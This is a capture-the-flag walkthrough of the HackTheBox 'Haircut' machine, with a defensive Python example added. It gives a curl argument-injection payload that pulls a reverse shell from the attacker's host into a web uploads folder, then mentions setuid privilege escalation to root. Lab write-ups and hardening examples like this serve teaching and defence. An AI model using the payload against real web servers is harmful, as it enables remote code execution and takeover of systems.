HackTheBox Haircut Walkthrough

Dare I say this box was easy?  Maybe not for everyone, of course, but I will say this could be the quickest HtB box I've ever rooted.  There's a little bit of hunting and a little bit of creativity required.  Aside from that, take a look at what's in your hand and do some Googling, and you can figure this one out quickly.

We kick off with Nmap:





Not much here.  Web seems like the obvious entry.  We view the default page:





Viewing source reveals nothing. 

Hitting it with GoBuster:





Two things stand out:  exposed.php & /uploads

Checking out the php page:





Tossing a few things in there to get an idea of what I'm dealing with, I uncover an error:





We can direct it to our attacking server which is hosting a reverse shell in .txt format.  If you host it with a .php extension, you pop your own box.  #truestory

The full syntax is this:  http://192.168.86.99/rshell443.txt --output ./uploads/rshell443.php
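Why that extra `--output` word works, and how the form handler could refuse it, shown as an added example (not code from the box or from this walkthrough). It assumes exposed.php pastes the field into a curl command line; the function names and the example.test inputs are constructed for illustration.

```python
import shlex
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


class RejectedInput(ValueError):
    """Raised when the form field is not a single plain http(s) URL."""


def naive_argv(field: str) -> list[str]:
    # Vulnerable pattern (assumed): the field is pasted into a command line,
    # so it is split on whitespace and the extra words become curl options.
    return ["curl"] + shlex.split(field)


def injected_options(field: str) -> list[str]:
    # Detection helper: words after the first that curl would parse as options.
    return [w for w in shlex.split(field)[1:] if w.startswith("-")]


def safe_argv(field: str) -> list[str]:
    value = field.strip()
    if not value or any(c.isspace() or ord(c) < 32 for c in value):
        raise RejectedInput("must be one token with no whitespace")
    if value.startswith("-"):
        raise RejectedInput("must not look like an option")
    try:
        parts = urlsplit(value)
    except ValueError as exc:
        raise RejectedInput("malformed URL") from exc
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        raise RejectedInput("only absolute http/https URLs are accepted")
    # Argument list, no shell. "--" ends curl's option parsing and
    # --proto restricts which protocols curl will speak.
    return ["curl", "--silent", "--max-time", "10",
            "--proto", "=http,https", "--", value]


# Constructed sample inputs (not taken from a real log).
BENIGN = "http://example.test/bounce.php"
TAMPERED = "http://example.test/a.txt --output ./uploads/a.php"

if __name__ == "__main__":
    print(naive_argv(TAMPERED))        # the field has become URL + option + path
    print(injected_options(TAMPERED))  # what a log review should flag
    print(safe_argv(BENIGN))           # argv to run without a shell
```

Serving /uploads without PHP execution is a second, independent control: a file written there would then not run when requested.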





Now when we browse to our shell in the /uploads directory:





With our handler set up:





Hunting for setuid binaries:





One sticks out. 

A quick search reveals:





If you attempt to run this on the victim's box, you will find that gcc is missing.  If you run this on your attacking machine, you can collect the compiled pieces in the /tmp directory and move them over to the /tmp directory on the victim.  When you execute the script.sh exploit, you still get the gcc error but we already have the files and we get root:





You'll notice I skipped right over user.txt -- that's because I rooted this box so fast that I didn't even bother looking for it.  I'll leave that up to you.

Going for the root flag:




#gameover

Quick but still fun.